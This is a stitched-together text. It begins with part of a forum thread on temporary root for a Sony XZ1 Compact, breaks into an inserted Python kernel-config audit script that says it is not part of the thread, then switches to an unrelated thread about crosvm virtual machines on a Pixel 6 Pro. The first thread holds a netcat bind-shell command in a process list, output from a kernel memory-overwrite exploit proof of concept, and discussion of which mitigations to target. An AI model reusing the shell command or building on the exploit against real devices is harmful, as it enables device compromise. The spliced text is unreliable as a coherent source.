115 0 [DIAG_USB_diag]
116 0 [diag_cntl_wq]
117 0 [diag_dci_wq]
118 0 [DIAG_SMD_MODEM_]
119 0 [DIAG_SMD_MODEM_]
120 0 [DIAG_SMD_MODEM_]
121 0 [DIAG_SMD_MODEM_]
122 0 [DIAG_SMD_MODEM_]
123 0 [DIAG_SMD_LPASS_]
124 0 [DIAG_SMD_LPASS_]
125 0 [DIAG_SMD_LPASS_]
126 0 [DIAG_SMD_LPASS_]
127 0 [DIAG_SMD_LPASS_]
128 0 [DIAG_SMD_WCNSS_]
129 0 [DIAG_SMD_WCNSS_]
130 0 [DIAG_SMD_WCNSS_]
131 0 [DIAG_SMD_WCNSS_]
132 0 [DIAG_SMD_WCNSS_]
133 0 [DIAG_SMD_SENSOR]
134 0 [DIAG_SMD_SENSOR]
135 0 [DIAG_SMD_SENSOR]
136 0 [DIAG_SMD_SENSOR]
137 0 [DIAG_SMD_SENSOR]
138 0 [DIAG_SMD_DIAG_C]
139 0 [DIAG_SMD_DIAG_D]
140 0 [DIAG_SMD_DIAG_C]
141 0 [DIAG_SMD_DIAG_D]
142 0 [DIAG_SMD_DIAG_D]
143 0 [DIAG_SMD_CDSP_C]
144 0 [DIAG_SMD_CDSP_D]
145 0 [DIAG_SMD_CDSP_C]
146 0 [DIAG_SMD_CDSP_D]
147 0 [DIAG_SMD_CDSP_D]
148 0 [DIAG_SOCKMODEM_]
149 0 [DIAG_SOCKMODEM_]
150 0 [DIAG_SOCKMODEM_]
151 0 [DIAG_SOCKMODEM_]
152 0 [DIAG_SOCKMODEM_]
153 0 [DIAG_SOCKLPASS_]
154 0 [DIAG_SOCKLPASS_]
155 0 [DIAG_SOCKLPASS_]
156 0 [DIAG_SOCKLPASS_]
157 0 [DIAG_SOCKLPASS_]
158 0 [DIAG_SOCKWCNSS_]
159 0 [DIAG_SOCKWCNSS_]
160 0 [DIAG_SOCKWCNSS_]
161 0 [DIAG_SOCKWCNSS_]
162 0 [DIAG_SOCKWCNSS_]
163 0 [DIAG_SOCKSENSOR]
164 0 [DIAG_SOCKSENSOR]
165 0 [DIAG_SOCKSENSOR]
166 0 [DIAG_SOCKSENSOR]
167 0 [DIAG_SOCKSENSOR]
168 0 [DIAG_SOCKDIAG_C]
169 0 [DIAG_SOCKDIAG_D]
170 0 [DIAG_SOCKDIAG_C]
171 0 [DIAG_SOCKDIAG_D]
172 0 [DIAG_SOCKDIAG_D]
173 0 [DIAG_SOCKCDSP_C]
174 0 [DIAG_SOCKCDSP_D]
175 0 [DIAG_SOCKCDSP_C]
176 0 [DIAG_SOCKCDSP_D]
177 0 [DIAG_SOCKCDSP_D]
178 0 [DIAG_CNTL_SOCKE]
179 0 [DIAG_GLINK_DIAG]
180 0 [DIAG_GLINK_DIAG]
181 0 [DIAG_GLINK_DIAG]
182 0 [DIAG_GLINK_DIAG]
183 0 [DIAG_GLINK_DIAG]
185 0 [DIAG_USB_diag_m]
186 0 [kgsl-workqueue]
187 0 [kgsl-mementry]
188 0 [kgsl_worker_thr]
189 0 [bioset]
190 0 [bioset]
191 0 [bioset]
192 0 [bioset]
193 0 [bioset]
194 0 [bioset]
195 0 [bioset]
196 0 [bioset]
197 0 [bioset]
198 0 [bioset]
199 0 [bioset]
200 0 [bioset]
201 0 [bioset]
202 0 [bioset]
203 0 [bioset]
204 0 [bioset]
205 0 [bioset]
206 0 [bioset]
207 0 [bioset]
208 0 [bioset]
209 0 [bioset]
210 0 [bioset]
211 0 [bioset]
212 0 [bioset]
213 0 [bioset]
214 0 [memory_wq]
215 0 [qcrypto_seq_res]
216 0 [bond0]
217 0 [sharedmem_qmi_w]
218 0 [qmi_hndl0000000]
219 0 [msm_ipc_router]
220 0 [uether]
221 0 [k_ipa_usb]
222 0 [dm_bufio_cache]
223 0 [binder]
224 0 [hwbinder]
225 0 [vndbinder]
226 0 [uaudio_svc]
227 0 [qmi_hndl0000000]
228 0 [ipv6_addrconf]
229 0 [kworker/u4:2]
238 0 [msm_perf:events]
239 0 [rq_stats]
340 0 nc -ll -p 5000 -e /bin/sh
341 0 /bin/sh
344 0 ps
cat /proc/version
Linux version 4.4.74-perf+ ([email protected]) (gcc version 4.9.x 20150123 (prerelease) (GCC) ) #1 SMP PREEMPT Wed Aug 9 16:09:57 2017
cat /proc/cpuinfo
Processor : AArch64 Processor rev 0 (aarch64)
processor : 0
BogoMIPS : 125.00
Features : fp asimd evtstrm aes pmull sha1 sha2 crc32
CPU implementer : 0x41
CPU architecture: 8
CPU variant : 0x1
CPU part : 0xd07
CPU revision : 0
processor : 1
BogoMIPS : 125.00
Features : fp asimd evtstrm aes pmull sha1 sha2 crc32
CPU implementer : 0x41
CPU architecture: 8
CPU variant : 0x1
CPU part : 0xd07
CPU revision : 0
Hardware : Qualcomm Technologies, Inc Unknown CPU
I also tried the inotify/rename PoC again, this time built statically for Linux:
Code:
/exploit-aarch64-linux-gnu
Listening for events.
Listening for events.
alloc_len : 50
longname="test_dir/bbbb32103210321032100��1����"
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : b, event->len : 16
Detected overwrite!!!
callrename done.
So it also works in qemu, running the kernel binary from the firmware (it needed a few binary patches to avoid hangs due to missing hw features), so this makes a very good playground for a real exploit implementation - kernel offsets (after kaslr bypass) should hopefully match the real device.
There is still a lot of work to do - anybody willing to help?
I'm sorry I can't help because I lack the skills to, but I will surely pay the amount I pledged in the DRM key backup/restore bounty thread, if you manage to pull it off and also allow non-developers to do it!
Here is some advice: anybody who would like to keep the possibility to back up DRM keys should disable all updates so that the fw version stays at the one the phone was bought with.
It is possible that Sony would disable downgrades since a particular version - that is, after all, Google's recommendation for vendors:
google-urges-smartphone-partners-support-android-oreos-rollback-protection
And download the oldest fw version available (do not care about the customization not matching your phone's original) to have it handy in case Sony pulls the fw off.
It would be useful if anybody who already upgraded to the latest fw version tried whether it is still possible to downgrade, for example to the 47.1.A.2.281 discussed here, and reported the result.
@j4nn: Are all your observations so far specific to the XZ1C? As the exploit itself isn't inherent to the XZ1C, might it be worthwhile to crosspost this to the XZ1 and XZ1 Premium forums? The more eyeballs you can get on this idea, the better.
right, it may be useful - the mentioned vulnerabilities are not hardware dependent. In case of xz1 and xz1p, the same kernel source branch is shared differing only in kernel defconfig, changing hw dependent options.
Basically any oreo device which could be flashed with fw containing the mentioned CVEs could possibly use them to get temp root.
But I have only xz1c, this is what I can test with, so that's why it is posted here.
Feel free to link to this thread to get possibly some devs who might help to implement the exploit(s).
An interesting find: the kernel from 47.1.A.2.281 fw has the following option in its config:
CONFIG_CC_STACKPROTECTOR_REGULAR=y
It seems that this is changed to the STRONG variant since 47.1.A.3.xxx firmwares.
That means stack based kernel exploits could still be possible with the 2.281 fw - for comparison, in the Linux kernel:
- regular: 1015 of 36110 functions are stack-protected (2.81%)
- strong: 7401 of 36110 functions are stack-protected (20.5%)
Just for reference - the following options are enabled:
- CONFIG_ARM64_SW_TTBR0_PAN: Privileged Access Never (PAN) sw emulation
- CONFIG_DEBUG_RODATA: Make kernel text and rodata read-only (Post-init read-only memory)
- CONFIG_RANDOMIZE_BASE: Randomize the address of the kernel image (KASLR)
- CONFIG_HARDENED_USERCOPY
- Privileged Execute Never (PXN) is obviously integrated by default (preventing user code execution with privilege mode)
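A defender-side check of the options discussed in the post above, as an added example that is not part of the thread: it parses a kernel `.config` (or `/proc/config.gz`) and reports the stack-protector variant and the four listed mitigations. The two sample fragments are constructed from the post's description; that only the stack-protector choice differs between them is an assumption, and all function names are hypothetical.

```python
import gzip
import re

# Mitigations named in the post; descriptions follow the post's wording.
BOOLEAN_MITIGATIONS = {
    "CONFIG_ARM64_SW_TTBR0_PAN": "Privileged Access Never (sw emulation)",
    "CONFIG_DEBUG_RODATA": "kernel text and rodata read-only",
    "CONFIG_RANDOMIZE_BASE": "KASLR",
    "CONFIG_HARDENED_USERCOPY": "hardened usercopy",
}
STACKPROTECTOR_LEVELS = ("NONE", "REGULAR", "STRONG")  # weakest to strongest

_SET = re.compile(r"^(CONFIG_\w+)=(.*)$")
_UNSET = re.compile(r"^# (CONFIG_\w+) is not set$")

# Constructed sample: REGULAR stack protector plus the options the post lists.
SAMPLE_FW_2_281 = """\
CONFIG_CC_STACKPROTECTOR=y
# CONFIG_CC_STACKPROTECTOR_NONE is not set
CONFIG_CC_STACKPROTECTOR_REGULAR=y
# CONFIG_CC_STACKPROTECTOR_STRONG is not set
CONFIG_ARM64_SW_TTBR0_PAN=y
CONFIG_DEBUG_RODATA=y
CONFIG_RANDOMIZE_BASE=y
CONFIG_HARDENED_USERCOPY=y
"""

# Constructed sample: same fragment with the STRONG variant selected
# (assumption: nothing else changed between the two firmware lines).
SAMPLE_FW_3_XXX = (
    SAMPLE_FW_2_281
    .replace("CONFIG_CC_STACKPROTECTOR_REGULAR=y",
             "# CONFIG_CC_STACKPROTECTOR_REGULAR is not set")
    .replace("# CONFIG_CC_STACKPROTECTOR_STRONG is not set",
             "CONFIG_CC_STACKPROTECTOR_STRONG=y")
)


def parse_config(text):
    """Return {symbol: value}; '# CONFIG_X is not set' is recorded as 'n'."""
    options = {}
    for raw in text.splitlines():
        line = raw.strip()
        match = _SET.match(line)
        if match:
            options[match.group(1)] = match.group(2).strip('"')
            continue
        match = _UNSET.match(line)
        if match:
            options[match.group(1)] = "n"
    return options


def load_config(path):
    """Read a plain .config or a gzip-compressed one such as /proc/config.gz."""
    opener = gzip.open if path.endswith(".gz") else open
    with opener(path, "rt", encoding="utf-8", errors="replace") as handle:
        return parse_config(handle.read())


def stackprotector_level(options):
    """Strongest selected variant; a config with none selected counts as NONE."""
    level = "NONE"
    for name in STACKPROTECTOR_LEVELS:
        if options.get("CONFIG_CC_STACKPROTECTOR_" + name) == "y":
            level = name
    return level


def audit(options):
    """Summarise the mitigations from the post for one parsed config."""
    report = {"stackprotector": stackprotector_level(options)}
    for symbol in BOOLEAN_MITIGATIONS:
        report[symbol] = options.get(symbol) == "y"
    return report


def findings(report):
    """Sorted keys that are weaker than the hardened setting."""
    weak = [key for key in BOOLEAN_MITIGATIONS if not report[key]]
    if report["stackprotector"] != "STRONG":
        weak.append("stackprotector")
    return sorted(weak)


def changes(old_report, new_report):
    """Map each key whose value differs to an (old, new) tuple."""
    return {key: (old_report[key], new_report[key])
            for key in old_report if old_report[key] != new_report[key]}


if __name__ == "__main__":
    old = audit(parse_config(SAMPLE_FW_2_281))
    new = audit(parse_config(SAMPLE_FW_3_XXX))
    print("2.281 sample findings:", findings(old))
    print("3.xxx sample findings:", findings(new))
    print("changed between samples:", changes(old, new))
```
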
j4nn said:
right, it may be useful - the mentioned vulnerabilities are not hardware dependent. In case of xz1 and xz1p, the same kernel source branch is shared differing only in kernel defconfig, changing hw dependent options.
Basically any oreo device which could be flashed with fw containing the mentioned CVEs could possibly use them to get temp root.
But I have only xz1c, this is what I can test with, so that's why it is posted here.
Feel free to link to this thread to get possibly some devs who might help to implement the exploit(s).
When you talk about xz1p is the Sony Xperia XZ Premium, no?
SilverGamer_YT said:
When you talk about xz1p is the Sony Xperia XZ Premium, no?
Yes, same Yoshino platform (even though maybe it would be a tad easier to work on Premium, due to it having nougat too)
mirhl said:
Yes, same Yoshino platform (even though maybe it would be a tad easier to work on Premium, due to it having nougat too)
If we have already unlocked bootloader we cannot backup our drmkeys
@SilverGamer_YT, obviously no way if already lost by official unlock
mirhl said:
Yes, same Yoshino platform (even though maybe it would be a tad easier to work on Premium, due to it having nougat too)
that's right, but on the other hand, useful only for that device.
I am wondering - there is no temp root yet for the Premium if it had nougat?
Lowest patch level I could find is April (compared to August of XZ1)... Which is a pretty hard target still.
@mirhl: it's strange that temp root is still not available for xz premium, considering it has nougat fw available.
The kernel is v4.4.21 in that fw and it does not have hardened usercopy, does not have privileged access never and also uses only regular stack protector. So it really would be easier, but it would not help devices that have only oreo fw (and only newer kernel with more mitigations integrated).
I feel we may be able to get temp root.
But what about that TA/drm keys backup?
Is there anybody here who knows for sure that having temp root is enough?
Would we not then be faced with another security feature like trust zone / trusted execution environment from which it would not be possible to extract the keys?
I mean exploiting linux kernel is one thing, but exploiting TEE would probably be a lot harder (if not impossible).

Question Trying to run protected virtual machine

Hey guys. Recently I've got a Pixel 6 Pro device.
I'm trying to run a virtual machine on my phone with additional security features of Android 13 kernel which is called protected KVM(pKVM).
After following the steps of the documentation, I encountered the errors below.
The kernel I'm running on my Pixel 6 Pro device is the latest Android 13 kernel. The command I ran is:
Code:
/apex/com.android.virt/bin/crosvm run --protected-vm -p 'root=/dev/vda' --rwdisk ${my_disk_image} ${my_kernel_image}
Has anyone solved these errors or launched a protected virtual machine successfully?
I haven't tried yet, but I'm a heavy virtual device user so I would definitely be interested if anyone has any luck.
roirraW edor ehT said:
I haven't tried yet, but I'm a heavy virtual device user so I would definitely be interested if anyone has any luck.
Although I haven't run a vm with --protected-vm option so far, I successfully ran a vm by following the steps in the link below.
How to run a Linux VM on Android 13
Android 13 adds a virtualization feature. Here's how to use it to run Linux in a VM.
blog.esper.io
Thanks for replying!
headheadhead said:
Although I haven't run a vm with --protected-vm option so far, I successfully ran a vm by following the steps in the link below.
How to run a Linux VM on Android 13
Android 13 adds a virtualization feature. Here's how to use it to run Linux in a VM.
blog.esper.io
Thanks for replying!
You're welcome. Your response reminded me that there was an XDA article on the subject about VMs on the Pixel 6 as well, although it probably won't help with what you're trying to do.
Android 13 DP1 allows Google Pixel 6 to run full-fledged Windows 11 as a VM
The Android 13 DP1 unlocks the full KVM functionality on the Google Pixel 6 and 6 Pro. You can now boot Windows 11 and Linux VMs on these phones.
www.xda-developers.com
Hi, I too followed the instruction, but could not get it to run. Can someone tell me how they built their kernel?
Just to clarify I have built several kernels, and I can get them to run but it won't mount my file system. Can anyone show me how they built their kernel?
I am trying to run a Linux kernel in the VM
rgarcia1000 said:
Just to clarify I have built several kernels, and I can get them to run but it won't mount my file system. Can anyone show me how they built their kernel?
I am trying to run a Linux kernel in the VM
I can run a VM with following command.
Code:
/apex/com.android.virt/bin/crosvm run -p 'root=/dev/vda' --rwdisk ${my_disk_image} ${my_kernel_image}
The kernel I built is the linux mainline kernel. The image I used is ubuntu cloud image.
Thanks, I will give it a try.
Hi, Guys and Ladies,
I am new to this board. I have been trying to make this work for 3 weeks now.
This is what I tried.
./crosvm run --disable-sandbox -p 'init=/bin/sh' --rwroot /data/local/tmp/ubuntu-20.04-server-cloudimg-arm64.squashfs /data/local/tmp/ubuntu-20.04-serv>
[INFO:external/crosvm/src/linux/device_helpers.rs:131] Trying to attach block device: /data/local/tmp/ubuntu-20.04-server-cloudimg-arm64.squashfs
[INFO:external/crosvm/disk/src/disk.rs:175] disk size 379260928,
[INFO:external/crosvm/disk/src/disk.rs:164] Disk image file is hosted on file system type f2f52010
[INFO:external/crosvm/disk/src/disk.rs:175] disk size 379260928,
[INFO:external/crosvm/disk/src/disk.rs:164] Disk image file is hosted on file system type f2f52010
[ERROR:external/crosvm/src/main.rs:2884] crosvm has exited with error: the architecture failed to build the vm: kernel could not be loaded: Reading image into memory failed: invalid guest memory access at addr=0x80800000: requested memory range spans past the end of the region: offset=8388608 count=568590336 region_size=268435456
I also tried:
./crosvm run --disable-sandbox -p 'init=/bin/sh' --rwroot /data/local/tmp/alpine-rootfs.img /data/local/tmp/Image
[INFO:external/crosvm/src/linux/device_helpers.rs:131] Trying to attach block device: /data/local/tmp/alpine-rootfs.img
[INFO:external/crosvm/disk/src/disk.rs:175] disk size 2613248,
[INFO:external/crosvm/disk/src/disk.rs:164] Disk image file is hosted on file system type f2f52010
[INFO:external/crosvm/disk/src/disk.rs:175] disk size 2613248,
[INFO:external/crosvm/disk/src/disk.rs:164] Disk image file is hosted on file system type f2f52010
[ 0.000000] Booting Linux on physical CPU 0x0000000000 [0x411fd440]
[ 0.000000] Linux version 5.16.13-1-aarch64-ARCH ([email protected]) (aarch64-unknown-linux-gnu-gcc (GCC) 11.2.0, GNU ld (GNU Binutils) 2.38) #1 SMP Thu Mar 10 01:59:18 UTC 2022
[ 0.000000] Machine model: linux,dummy-virt
[ 0.000000] efi: UEFI not found.
[ 0.000000] Zone ranges:
[ 0.000000] DMA [mem 0x0000000080000000-0x000000008fffffff]
[ 0.000000] DMA32 empty
[ 0.000000] Normal empty
[ 0.000000] Movable zone start for each node
[ 0.000000] Early memory node ranges
[ 0.000000] node 0: [mem 0x0000000080000000-0x000000008fffffff]
[ 0.000000] Initmem setup node 0 [mem 0x0000000080000000-0x000000008fffffff]
[ 0.000000] cma: Reserved 64 MiB at 0x000000008b800000
[ 0.000000] psci: probing for conduit method from DT.
[ 0.000000] psci: PSCIv1.1 detected in firmware.
[ 0.000000] psci: Using standard PSCI v0.2 function IDs
[ 0.000000] psci: Trusted OS migration not required
[ 0.000000] psci: SMC Calling Convention v1.1
[ 0.000000] smccc: KVM: hypervisor services detected (0x00000000 0x00000000 0x00000000 0x00000003)
[ 0.000000] percpu: Embedded 20 pages/cpu s44568 r8192 d29160 u81920
[ 0.000000] Detected PIPT I-cache on CPU0
[ 0.000000] CPU features: detected: GIC system register CPU interface
[ 0.000000] CPU features: detected: Hardware dirty bit management
[ 0.000000] CPU features: detected: Spectre-v4
[ 0.000000] Built 1 zonelists, mobility grouping on. Total pages: 64512
[ 0.000000] Kernel command line: panic=-1 console=ttyS0 init=/bin/sh root=/dev/vda rw
[ 0.000000] Dentry cache hash table entries: 32768 (order: 6, 262144 bytes, linear)
[ 0.000000] Inode-cache hash table entries: 16384 (order: 5, 131072 bytes, linear)
[ 0.000000] mem auto-init: stackff, heap allocff, heap freeff
[ 0.000000] Memory: 150828K/262144K available (19648K kernel code, 3938K rwdata, 9712K rodata, 6336K init, 865K bss, 45780K reserved, 65536K cma-reserved)
[ 0.000000] random: get_random_u64 called from cache_random_seq_create+0x84/0x184 with crng_init=0
[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
[ 0.000000] rcu: Hierarchical RCU implementation.
[ 0.000000] rcu: RCU restricting CPUs from NR_CPUS=8 to nr_cpu_ids=1.
[ 0.000000] Trampoline variant of Tasks RCU enabled.
[ 0.000000] Rude variant of Tasks RCU enabled.
[ 0.000000] Tracing variant of Tasks RCU enabled.
[ 0.000000] rcu: RCU calculated value of scheduler-enlistment delay is 100 jiffies.
[ 0.000000] rcu: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=1
[ 0.000000] NR_IRQS: 64, nr_irqs: 64, preallocated irqs: 0
[ 0.000000] GICv3: 32 SPIs implemented
[ 0.000000] GICv3: 0 Extended SPIs implemented
[ 0.000000] GICv3: Distributor has no Range Selector support
[ 0.000000] Root IRQ handler: gic_handle_irq
[ 0.000000] GICv3: 16 PPIs implemented
[ 0.000000] GICv3: CPU0: found redistributor 0 region 0:0x000000003ffd0000
[ 0.000000] arch_timer: cp15 timer(s) running at 24.57MHz (virt).
[ 0.000000] clocksource: arch_sys_counter: mask: 0xffffffffffffff max_cycles: 0x5ab00a189, max_idle_ns: 440795202599 ns
[ 0.000000] sched_clock: 56 bits at 24MHz, resolution 40ns, wraps every 4398046511099ns
[ 0.000062] arm-pv: using stolen time PV
[ 0.000271] Console: colour dummy device 80x25
[ 0.000320] Calibrating delay loop (skipped), value calculated using timer frequency.. 49.15 BogoMIPS (lpj=24576)
[ 0.000324] pid_max: default: 32768 minimum: 301
[ 0.000385] LSM: Security Framework initializing
[ 0.000407] Yama: becoming mindful.
[ 0.000490] Mount-cache hash table entries: 512 (order: 0, 4096 bytes, linear)
[ 0.000500] Mountpoint-cache hash table entries: 512 (order: 0, 4096 bytes, linear)
[ 0.002706] rcu: Hierarchical SRCU implementation.
[ 0.004135] EFI services will not be available.
[ 0.004315] smp: Bringing up secondary CPUs ...
[ 0.004317] smp: Brought up 1 node, 1 CPU
[ 0.004319] SMP: Total of 1 processors activated.
[ 0.004322] CPU features: detected: 32-bit EL0 Support
[ 0.004323] CPU features: detected: Data cache clean to the PoU not required for I/D coherence
[ 0.004325] CPU features: detected: Common not Private translations
[ 0.004326] CPU features: detected: CRC32 instructions
[ 0.004328] CPU features: detected: RCpc load-acquire (LDAPR)
[ 0.004329] CPU features: detected: LSE atomic instructions
[ 0.004330] CPU features: detected: Privileged Access Never
[ 0.004331] CPU features: detected: RAS Extension Support
[ 0.004339] CPU features: detected: Speculative Store Bypassing Safe (SSBS)
[ 0.040419] CPU: All CPU(s) started at EL1
[ 0.040435] alternatives: patching kernel code
[ 0.041279] devtmpfs: initialized
[ 0.041694] Registered cp15_barrier emulation handler
[ 0.041699] Registered setend emulation handler
[ 0.041765] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 1911260446275000 ns
[ 0.041769] futex hash table entries: 256 (order: 2, 16384 bytes, linear)
[ 0.041999] pinctrl core: initialized pinctrl subsystem
[ 0.042305] DMI not present or invalid.
[ 0.042538] NET: Registered PF_NETLINK/PF_ROUTE protocol family
[ 0.042898] DMA: preallocated 128 KiB GFP_KERNEL pool for atomic allocations
[ 0.043056] DMA: preallocated 128 KiB GFP_KERNEL|GFP_DMA pool for atomic allocations
[ 0.043204] DMA: preallocated 128 KiB GFP_KERNEL|GFP_DMA32 pool for atomic allocations
[ 0.043214] audit: initializing netlink subsys (disabled)
[ 0.043454] thermal_sys: Registered thermal governor 'fair_share'
[ 0.043455] thermal_sys: Registered thermal governor 'bang_bang'
[ 0.043456] thermal_sys: Registered thermal governor 'step_wise'
[ 0.043457] thermal_sys: Registered thermal governor 'user_space'
[ 0.043457] thermal_sys: Registered thermal governor 'power_allocator'
[ 0.043465] cpuidle: using governor ladder
[ 0.043467] cpuidle: using governor menu
[ 0.043518] hw-breakpoint: found 6 breakpoint and 4 watchpoint registers.
[ 0.043524] ASID allocator initialised with 65536 entries
[ 0.043836] Serial: AMBA PL011 UART driver
[ 0.046243] audit: type=2000 audit(0.042:1): state=initialized audit_enabled=0 res=1
[ 0.046364] HugeTLB registered 1.00 GiB page size, pre-allocated 0 pages
[ 0.046365] HugeTLB registered 32.0 MiB page size, pre-allocated 0 pages
[ 0.046366] HugeTLB registered 2.00 MiB page size, pre-allocated 0 pages
[ 0.046367] HugeTLB registered 64.0 KiB page size, pre-allocated 0 pages
[ 0.046565] cryptd: max_cpu_qlen set to 1000
[ 0.063702] raid6: neonx8 gen() 21845 MB/s
[ 0.080749] raid6: neonx8 xor() 18988 MB/s
[ 0.097796] raid6: neonx4 gen() 22290 MB/s
[ 0.114844] raid6: neonx4 xor() 17047 MB/s
[ 0.131889] raid6: neonx2 gen() 18187 MB/s
[ 0.148933] raid6: neonx2 xor() 16116 MB/s
[ 0.165978] raid6: neonx1 gen() 15432 MB/s
[ 0.183046] raid6: neonx1 xor() 14419 MB/s
[ 0.200402] raid6: int64x8 gen() 9719 MB/s
[ 0.217449] raid6: int64x8 xor() 5117 MB/s
[ 0.234493] raid6: int64x4 gen() 9341 MB/s
[ 0.251540] raid6: int64x4 xor() 5090 MB/s
[ 0.268585] raid6: int64x2 gen() 8131 MB/s
[ 0.285631] raid6: int64x2 xor() 4207 MB/s
[ 0.302676] raid6: int64x1 gen() 6389 MB/s
[ 0.319721] raid6: int64x1 xor() 3552 MB/s
[ 0.319724] raid6: using algorithm neonx4 gen() 22290 MB/s
[ 0.319725] raid6: .... xor() 17047 MB/s, rmw enabled
[ 0.319726] raid6: using neon recovery algorithm
[ 0.319810] ACPI: Interpreter disabled.
[ 0.320010] iommu: Default domain type: Translated
[ 0.320012] iommu: DMA domain TLB invalidation policy: strict mode
[ 0.320055] vgaarb: loaded
[ 0.320277] SCSI subsystem initialized
[ 0.320371] usbcore: registered new interface driver usbfs
[ 0.320383] usbcore: registered new interface driver hub
[ 0.320390] usbcore: registered new device driver usb
[ 0.320436] pps_core: LinuxPPS API ver. 1 registered
[ 0.320437] pps_core: Software ver. 5.3.6 - Copyright 2005-2007 Rodolfo Giometti <[email protected]>
[ 0.320439] PTP clock support registered
[ 0.320519] EDAC MC: Ver: 3.0.0
[ 0.320768] Advanced Linux Sound Architecture Driver Initialized.
[ 0.320982] NetLabel: Initializing
[ 0.320983] NetLabel: domain hash size = 128
[ 0.320984] NetLabel: protocols = UNLABELED CIPSOv4 CALIPSO
[ 0.321000] NetLabel: unlabeled traffic allowed by default
[ 0.321090] clocksource: Switched to clocksource arch_sys_counter
[ 0.321255] VFS: Disk quotas dquot_6.6.0
[ 0.321270] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
[ 0.321333] pnp: PnP ACPI: disabled
[ 0.322403] NET: Registered PF_INET protocol family
[ 0.322480] IP idents hash table entries: 4096 (order: 3, 32768 bytes, linear)
[ 0.322840] tcp_listen_portaddr_hash hash table entries: 256 (order: 0, 4096 bytes, linear)
[ 0.322848] TCP established hash table entries: 2048 (order: 2, 16384 bytes, linear)
[ 0.322873] TCP bind hash table entries: 2048 (order: 3, 32768 bytes, linear)
[ 0.322913] TCP: Hash tables configured (established 2048 bind 2048)
[ 0.323018] MPTCP token hash table entries: 256 (order: 0, 6144 bytes, linear)
[ 0.323033] UDP hash table entries: 256 (order: 1, 8192 bytes, linear)
[ 0.323044] UDP-Lite hash table entries: 256 (order: 1, 8192 bytes, linear)
[ 0.323073] NET: Registered PF_UNIX/PF_LOCAL protocol family
[ 0.323264] RPC: Registered named UNIX socket transport module.
[ 0.323266] RPC: Registered udp transport module.
[ 0.323266] RPC: Registered tcp transport module.
[ 0.323267] RPC: Registered tcp NFSv4.1 backchannel transport module.
[ 0.323268] PCI: CLS 0 bytes, default 64
[ 0.323333] kvm [1]: HYP mode not available
[ 0.323520] Initialise system trusted keyrings
[ 0.323652] workingset: timestamp_bits=46 max_order=16 bucket_order=0
[ 0.324672] zbud: loaded
[ 0.325157] NFS: Registering the id_resolver key type
[ 0.325169] Key type id_resolver registered
[ 0.325170] Key type id_legacy registered
[ 0.325189] nfs4filelayout_init: NFSv4 File Layout Driver Registering...
[ 0.325192] nfs4flexfilelayout_init: NFSv4 Flexfile Layout Driver Registering...
[ 0.325207] ntfs3: Max link count 4000
[ 0.325208] ntfs3: Read-only LZX/Xpress compression included
[ 0.325235] SGI XFS with ACLs, security attributes, quota, no debug enabled
[ 0.334012] NET: Registered PF_ALG protocol family
[ 0.334016] xor: measuring software checksum speed
[ 0.334475] 8regs : 22289 MB/sec
[ 0.334872] 32regs : 26656 MB/sec
[ 0.335122] arm64_neon : 44102 MB/sec
[ 0.335123] xor: using function: arm64_neon (44102 MB/sec)
[ 0.335146] Key type asymmetric registered
[ 0.335147] Asymmetric key parser 'x509' registered
[ 0.335181] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 242)
[ 0.335216] io scheduler mq-deadline registered
[ 0.335217] io scheduler kyber registered
[ 0.335234] io scheduler bfq registered
[ 0.336120] pci-host-generic 10000.pci: host bridge /pci ranges:
[ 0.336133] pci-host-generic 10000.pci: MEM 0x0002000000..0x0003ffffff -> 0x0002000000
[ 0.336136] pci-host-generic 10000.pci: MEM 0x0090800000..0xffffffffff -> 0x0090800000
[ 0.336139] pci-host-generic 10000.pci: Memory resource size exceeds max for 32 bits
[ 0.336141] PCI: OF: PROBE_ONLY enabled
[ 0.336151] pci-host-generic 10000.pci: ECAM at [mem 0x00010000-0x0100ffff] for [bus 00]
[ 0.336173] pci-host-generic 10000.pci: PCI host bridge to bus 0000:00
[ 0.336175] pci_bus 0000:00: root bus resource [mem 0x02000000-0x03ffffff]
